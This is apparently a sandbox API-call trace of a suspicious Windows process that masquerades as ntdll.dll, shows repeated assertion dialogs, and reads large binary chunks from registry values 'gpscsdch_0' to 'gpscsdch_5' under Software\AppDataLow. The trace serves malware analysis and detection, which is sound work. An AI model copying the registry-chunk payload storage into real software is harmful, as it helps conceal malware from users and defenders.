	[0120.533] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0120.778] SCardEstablishContext (in: dwScope=0x0, pvReserved1=0x0, pvReserved2=0x0, phContext=0x44a6b04 | out: phContext=0x44a6b04) returned -2146435043
	[0120.845] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x2e, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0120.906] GetLastError () returned 0x102
	[0120.906] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3c8 | out: lpPerformanceCount=0x20af3c8*=1820341300000) returned 1
	[0120.906] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1820341300000) returned 1
	[0120.907] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0120.907] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0120.907] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0120.907] IsDebuggerPresent () returned 0
	[0120.907] GetProcessWindowStation () returned 0x84
	[0120.907] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0120.907] GetActiveWindow () returned 0x0
	[0120.908] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0121.077] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x3ab, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0122.017] GetLastError () returned 0x102
	[0122.017] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3c8 | out: lpPerformanceCount=0x20af3c8*=1820452400000) returned 1
	[0122.017] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1820452400000) returned 1
	[0122.018] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0122.018] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0122.018] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0122.018] IsDebuggerPresent () returned 0
	[0122.018] GetProcessWindowStation () returned 0x84
	[0122.018] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0122.018] GetActiveWindow () returned 0x0
	[0122.018] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0122.186] SCardEstablishContext (in: dwScope=0x0, pvReserved1=0x0, pvReserved2=0x0, phContext=0x44a6b04 | out: phContext=0x44a6b04) returned -2146435043
	[0122.284] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x3c, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0122.355] GetLastError () returned 0x102
	[0122.355] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3c8 | out: lpPerformanceCount=0x20af3c8*=1820486200000) returned 1
	[0122.356] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1820486200000) returned 1
	[0122.356] QueryPerformanceCounter (in: lpPerformanceCount=0x20af918 | out: lpPerformanceCount=0x20af918*=1820486500000) returned 1
	[0122.363] QueryPerformanceCounter (in: lpPerformanceCount=0x20af8c8 | out: lpPerformanceCount=0x20af8c8*=1820487000000) returned 1
	[0122.363] QueryPerformanceCounter (in: lpPerformanceCount=0x20af8c8 | out: lpPerformanceCount=0x20af8c8*=1820487000000) returned 1
	[0122.363] SCardEstablishContext (in: dwScope=0x0, pvReserved1=0x0, pvReserved2=0x0, phContext=0x44a6b04 | out: phContext=0x44a6b04) returned -2146435043
	[0122.417] QueryPerformanceCounter (in: lpPerformanceCount=0x20af8c8 | out: lpPerformanceCount=0x20af8c8*=1820492400000) returned 1
	[0122.417] QueryPerformanceCounter (in: lpPerformanceCount=0x20af8c8 | out: lpPerformanceCount=0x20af8c8*=1820492400000) returned 1
	[0122.417] QueryPerformanceCounter (in: lpPerformanceCount=0x20af918 | out: lpPerformanceCount=0x20af918*=1820492400000) returned 1
	[0122.418] QueryPerformanceCounter (in: lpPerformanceCount=0x20af918 | out: lpPerformanceCount=0x20af918*=1820492400000) returned 1
	[0122.480] timeGetTime () returned 0x320a4
	[0122.480] timeGetTime () returned 0x320a4
	[0122.481] timeGetTime () returned 0x320a4
	[0122.509] timeGetTime () returned 0x320c1
	[0122.509] timeGetTime () returned 0x320c1
	[0122.509] timeGetTime () returned 0x320c1
	[0122.509] timeGetTime () returned 0x320c1
	[0122.510] timeGetTime () returned 0x320c1
	[0122.511] timeGetTime () returned 0x320c2
	[0122.511] timeGetTime () returned 0x320c3
	[0122.511] timeGetTime () returned 0x320c3
	[0122.511] timeGetTime () returned 0x320c3
	[0122.511] ReleaseSemaphore (in: hSemaphore=0x6fc, lReleaseCount=1, lpPreviousCount=0x20aefdc | out: lpPreviousCount=0x20aefdc) returned 1
	[0122.513] ReleaseSemaphore (in: hSemaphore=0x70c, lReleaseCount=1, lpPreviousCount=0x20aefdc | out: lpPreviousCount=0x20aefdc) returned 1
	[0122.513] ReleaseSemaphore (in: hSemaphore=0x71c, lReleaseCount=1, lpPreviousCount=0x20aefdc | out: lpPreviousCount=0x20aefdc) returned 1
	[0122.514] timeGetTime () returned 0x320c6
	[0122.518] timeGetTime () returned 0x320c9
	[0122.563] timeGetTime () returned 0x320f7
	[0122.563] timeGetTime () returned 0x320f7
	[0122.563] timeGetTime () returned 0x320f7
	[0122.564] timeGetTime () returned 0x320f7
	[0122.564] timeGetTime () returned 0x320f7
	[0122.564] timeGetTime () returned 0x320f7
	[0122.564] timeGetTime () returned 0x320f8
	[0122.564] timeGetTime () returned 0x320f8
	[0122.570] timeGetTime () returned 0x320fe
	[0122.570] timeGetTime () returned 0x320fe
	[0122.570] timeGetTime () returned 0x320fe
	[0122.570] timeGetTime () returned 0x320fe
	[0122.571] timeGetTime () returned 0x320fe
	[0122.571] timeGetTime () returned 0x320fe
	[0122.571] timeGetTime () returned 0x320ff
	[0122.571] timeGetTime () returned 0x320ff
	[0122.571] timeGetTime () returned 0x320ff
	[0122.573] timeGetTime () returned 0x32101
	[0122.573] timeGetTime () returned 0x32101
	[0122.574] timeGetTime () returned 0x32101
	[0122.660] QueryPerformanceCounter (in: lpPerformanceCount=0x20af8a0 | out: lpPerformanceCount=0x20af8a0*=1820516600000) returned 1
	[0122.660] QueryPerformanceCounter (in: lpPerformanceCount=0x20af918 | out: lpPerformanceCount=0x20af918*=1820516700000) returned 1
	[0122.660] QueryPerformanceCounter (in: lpPerformanceCount=0x20af910 | out: lpPerformanceCount=0x20af910*=1820516700000) returned 1
	[0122.661] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f89c, nSize=0x7fff | out: lpBuffer="\x37d9\x3f8\x4bf8\x25b\x6e40\x26d\x09") returned 0x0
	[0122.661] GetLastError () returned 0xcb
	[0122.661] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7f4, nSize=0x7fff | out: lpBuffer="ը瞙") returned 0x0
	[0122.661] GetLastError () returned 0xcb
	[0122.661] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7b4, nSize=0x7fff | out: lpBuffer="\x345d\x411\x4bd0\x25b\x2af4\x52\x3ac8\x52\x38ca\x3f8\xf868\x20a\x4bd0\x25b\xf800\x20a\x37d9\x3f8") returned 0x0
	[0122.661] GetLastError () returned 0xcb
	[0122.662] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7b4, nSize=0x7fff | out: lpBuffer="\x345d\x411\x4bd0\x25b\x2af4\x52\x3ac8\x52\x38ca\x3f8\xf868\x20a\x4bd0\x25b\xf800\x20a\x37d9\x3f8") returned 0x0
	[0122.662] GetLastError () returned 0xcb
	[0122.662] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7b4, nSize=0x7fff | out: lpBuffer="\x345d\x411\x4bd0\x25b\x2af4\x52\x3ac8\x52\x38ca\x3f8\xf868\x20a\x4bd0\x25b\xf800\x20a\x37d9\x3f8") returned 0x0
	[0122.662] GetLastError () returned 0xcb
	[0122.662] shutdown (s=0xa24, how=1) returned 0
	[0122.663] closesocket (s=0xa24) returned 0
	[0122.664] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x2bf, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 1
	[0122.664] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3f0 | out: lpPerformanceCount=0x20af3f0*=1820517100000) returned 1
	[0122.664] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1820517100000) returned 1
	[0122.664] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0122.664] GetLastError () returned 0x102
	[0122.664] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f8bc, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\xf8f0\x20a\x37d9\x3f8\xf968\x20a\x5220\x26d\x0a") returned 0x0
	[0122.664] GetLastError () returned 0xcb
	[0122.665] QueryPerformanceCounter (in: lpPerformanceCount=0x20af710 | out: lpPerformanceCount=0x20af710*=1820517200000) returned 1
	[0122.666] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1820517500000) returned 1
	[0122.668] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x2b7, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0123.364] GetLastError () returned 0x102
	[0123.364] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3c8 | out: lpPerformanceCount=0x20af3c8*=1820587100000) returned 1
	[0123.364] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1820587100000) returned 1
	[0123.365] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0123.365] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0123.365] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0123.365] IsDebuggerPresent () returned 0
	[0123.365] GetProcessWindowStation () returned 0x84
	[0123.365] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0123.365] GetActiveWindow () returned 0x0
	[0123.366] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0123.689] GetQueuedCompletionStatusEx (CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x112a73a, fAlertable=0) 

Thread:
	id = 110
	os_tid = 0x918

	[0088.645] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x258fdcc | out: lpWSAData=0x258fdcc) returned 0
	[0088.648] OutputDebugStringA (lpOutputString="WMA 0") 
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.649] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fd1c, lpdwDisposition=0x0 | out: phkResult=0x258fd1c*=0x1f4, lpdwDisposition=0x0) returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.650] GetLastError () returned 0x0
	[0088.651] GetLastError () returned 0x0
	[0088.651] GetLastError () returned 0x0
	[0088.651] GetLastError () returned 0x0
	[0088.651] GetLastError () returned 0x0
	[0088.651] wsprintfW (in: param_1=0x258fd40, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0088.651] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fcf0, lpdwDisposition=0x0 | out: phkResult=0x258fcf0*=0x1f8, lpdwDisposition=0x0) returned 0x0
	[0088.651] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x258fce4, lpData=0x0, lpcbData=0x258fcf0*=0x0 | out: lpType=0x258fce4*=0x3, lpData=0x0, lpcbData=0x258fcf0*=0x7d000) returned 0x0
	[0088.660] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x258fce4, lpData=0x508e70, lpcbData=0x258fcf0*=0x7d000 | out: lpType=0x258fce4*=0x3, lpData=0x508e70*, lpcbData=0x258fcf0*=0x7d000) returned 0x0
	[0088.673] RegCloseKey (hKey=0x1f8) returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.673] GetLastError () returned 0x0
	[0088.674] GetLastError () returned 0x0
	[0088.674] wsprintfW (in: param_1=0x258fd40, param_2="%s_%d" | out: param_1="gpscsdch_1") returned 10
	[0088.674] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fcf0, lpdwDisposition=0x0 | out: phkResult=0x258fcf0*=0x1f8, lpdwDisposition=0x0) returned 0x0
	[0088.674] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_1", lpReserved=0x0, lpType=0x258fce4, lpData=0x0, lpcbData=0x258fcf0*=0x0 | out: lpType=0x258fce4*=0x3, lpData=0x0, lpcbData=0x258fcf0*=0x7d000) returned 0x0
	[0088.728] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_1", lpReserved=0x0, lpType=0x258fce4, lpData=0x508e70, lpcbData=0x258fcf0*=0x7d000 | out: lpType=0x258fce4*=0x3, lpData=0x508e70*, lpcbData=0x258fcf0*=0x7d000) returned 0x0
	[0088.742] RegCloseKey (hKey=0x1f8) returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] GetLastError () returned 0x0
	[0088.757] wsprintfW (in: param_1=0x258fd40, param_2="%s_%d" | out: param_1="gpscsdch_2") returned 10
	[0088.757] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fcf0, lpdwDisposition=0x0 | out: phkResult=0x258fcf0*=0x1f8, lpdwDisposition=0x0) returned 0x0
	[0088.757] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_2", lpReserved=0x0, lpType=0x258fce4, lpData=0x0, lpcbData=0x258fcf0*=0x0 | out: lpType=0x258fce4*=0x3, lpData=0x0, lpcbData=0x258fcf0*=0x7d000) returned 0x0
	[0088.808] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_2", lpReserved=0x0, lpType=0x258fce4, lpData=0x508e70, lpcbData=0x258fcf0*=0x7d000 | out: lpType=0x258fce4*=0x3, lpData=0x508e70*, lpcbData=0x258fcf0*=0x7d000) returned 0x0
	[0088.824] RegCloseKey (hKey=0x1f8) returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] GetLastError () returned 0x0
	[0088.841] wsprintfW (in: param_1=0x258fd40, param_2="%s_%d" | out: param_1="gpscsdch_3") returned 10
	[0088.841] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fcf0, lpdwDisposition=0x0 | out: phkResult=0x258fcf0*=0x1f8, lpdwDisposition=0x0) returned 0x0
	[0088.892] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_3", lpReserved=0x0, lpType=0x258fce4, lpData=0x0, lpcbData=0x258fcf0*=0x0 | out: lpType=0x258fce4*=0x3, lpData=0x0, lpcbData=0x258fcf0*=0x7d000) returned 0x0
	[0088.896] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_3", lpReserved=0x0, lpType=0x258fce4, lpData=0x508e70, lpcbData=0x258fcf0*=0x7d000 | out: lpType=0x258fce4*=0x3, lpData=0x508e70*, lpcbData=0x258fcf0*=0x7d000) returned 0x0
	[0088.909] RegCloseKey (hKey=0x1f8) returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.987] GetLastError () returned 0x0
	[0088.988] GetLastError () returned 0x0
	[0088.988] wsprintfW (in: param_1=0x258fd40, param_2="%s_%d" | out: param_1="gpscsdch_4") returned 10
	[0088.988] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fcf0, lpdwDisposition=0x0 | out: phkResult=0x258fcf0*=0x1d0, lpdwDisposition=0x0) returned 0x0
	[0088.988] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_4", lpReserved=0x0, lpType=0x258fce4, lpData=0x0, lpcbData=0x258fcf0*=0x0 | out: lpType=0x258fce4*=0x3, lpData=0x0, lpcbData=0x258fcf0*=0x7d000) returned 0x0
	[0088.995] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_4", lpReserved=0x0, lpType=0x258fce4, lpData=0x508e70, lpcbData=0x258fcf0*=0x7d000 | out: lpType=0x258fce4*=0x3, lpData=0x508e70*, lpcbData=0x258fcf0*=0x7d000) returned 0x0
	[0089.040] RegCloseKey (hKey=0x1d0) returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] GetLastError () returned 0x0
	[0089.130] wsprintfW (in: param_1=0x258fd40, param_2="%s_%d" | out: param_1="gpscsdch_5") returned 10
	[0089.130] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fcf0, lpdwDisposition=0x0 | out: phkResult=0x258fcf0*=0x1d0, lpdwDisposition=0x0) returned 0x0
	[0089.130] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_5", lpReserved=0x0, lpType=0x258fce4, lpData=0x0, lpcbData=0x258fcf0*=0x0 | out: lpType=0x258fce4*=0x3, lpData=0x0, lpcbData=0x258fcf0*=0x7d000) returned 0x0
